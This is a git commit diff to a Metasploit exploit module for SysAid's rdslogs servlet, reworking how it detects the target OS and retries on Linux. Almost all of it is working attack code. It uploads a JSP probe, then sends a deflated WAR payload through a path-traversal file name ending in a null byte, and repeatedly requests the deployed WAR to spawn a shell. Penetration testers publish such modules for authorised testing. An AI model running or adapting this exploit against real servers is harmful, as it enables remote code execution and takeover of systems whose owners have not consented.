Fix Linux target by trying again if exploit fails

Pedro Ribeiro · Pedro Ribeiro · commit 7483e77bbac6 · 2015-07-18T20:12:13.000+01:00
diff --git a/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb b/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb
@@ -75,47 +75,79 @@ def check
       return Exploit::CheckCode::Detected
     end
   end
+  
+  
+  def pick_target
+    unless target.name == 'Automatic'
+      return target
+    end
 
+    print_status("#{peer} - Determining target")
+    os_finder_payload = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>}
+    url = upload_payload(os_finder_payload, false)
 
-  def exploit
-    app_base = rand_text_alphanumeric(4 + rand(32 - 4))
-    tomcat_path = '../../../../'
-    servlet_path = 'rdslogs'
-
-    # We need to create the upload directories before our first attempt to upload the WAR.
-    print_status("#{peer} - Creating upload directory")
-    bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))
-    send_request_cgi({
-      'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),
-      'method' => 'POST',
-      'data' => Zlib::Deflate.deflate(rand_text_alphanumeric(4 + rand(32 - 4))),
-      'ctype' => 'application/xml',
-      'vars_get' => {
-        'rdsName' => bogus_file
-      }
+    res = send_request_cgi({
+      'uri'    => normalize_uri(datastore['TARGETURI'], url),
+      'method' => 'GET',
+      'cookie' => @cookie,
+      'headers' => { 'Referer' => Rex::Text.rand_text_alpha(10 + rand(10)) }
     })
 
-    war_payload = payload.encoded_war({ :app_name => app_base }).to_s
+    if res && res.code == 200
+      if res.body.to_s =~ /Linux/
+        register_files_for_cleanup('webapps/' + url)
+        return targets[1]
+      elsif res.body.to_s =~ /Windows/
+        register_files_for_cleanup('root/' + url)
+        return targets[2]
+      end
+    end
 
+    nil
+  end
+  
+  
+  def send_payload(war_payload, tomcat_path, app_base)
     # We have to use the Zlib deflate routine as the Metasploit Zip API seems to fail
     print_status("#{peer} - Uploading WAR file...")
     res = send_request_cgi({
-      'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),
+      'uri' => normalize_uri(datastore['TARGETURI'], 'rdslogs'),
       'method' => 'POST',
       'data' => Zlib::Deflate.deflate(war_payload),
       'ctype' => 'application/octet-stream',
       'vars_get' => {
-        'rdsName' => "#{tomcat_path}/tomcat/webapps/#{app_base}.war\x00"
+        'rdsName' => "../../../../#{tomcat_path}#{app_base}.war\x00"
       }
     })
-
+    
     # The server either returns a 200 OK when the upload is successful.
     if res && res.code == 200
       print_status("#{peer} - Upload appears to have been successful, waiting #{datastore['SLEEP']} seconds for deployment")
-      register_files_for_cleanup("tomcat/webapps/#{app_base}.war")
     else
       fail_with(Failure::Unknown, "#{peer} - WAR upload failed")
     end
+  end
+
+
+  def exploit
+    # We need to create the upload directories before our first attempt to upload the WAR.
+    print_status("#{peer} - Creating upload directory")
+    bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))
+    send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], 'rdslogs'),
+      'method' => 'POST',
+      'data' => Zlib::Deflate.deflate(rand_text_alphanumeric(4 + rand(32 - 4))),
+      'ctype' => 'application/xml',
+      'vars_get' => {
+        'rdsName' => bogus_file
+      }
+    })
+
+    app_base = rand_text_alphanumeric(4 + rand(32 - 4))
+    war_payload = payload.encoded_war({ :app_name => app_base }).to_s
+    
+    send_payload(war_payload, 'tomcat/webapps/', app_base)
+    register_files_for_cleanup("tomcat/webapps/#{app_base}.war")
 
     10.times do
       select(nil, nil, nil, 2)
@@ -131,5 +163,26 @@ def exploit
       # Success! Triggered the payload, should have a shell incoming
       break if res.code == 200
     end
+    print_error("#{peer} - Failed to launch payload. Trying one last time with a different path...")
+    
+    # OK this might be a Linux server, it's a different traversal path.
+    # Let's try again...
+    send_payload(war_payload, '', app_base)
+    register_files_for_cleanup("webapps/#{app_base}.war")
+    
+    10.times do
+      select(nil, nil, nil, 2)
+
+      # Now make a request to trigger the newly deployed war
+      print_status("#{peer} - Attempting to launch payload in deployed WAR...")
+      res = send_request_cgi({
+        'uri'    => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
+        'method' => 'GET'
+      })
+      # Failure. The request timed out or the server went away.
+      break if res.nil?
+      # Success! Triggered the payload, should have a shell incoming
+      break if res.code == 200
+    end    
   end
 end
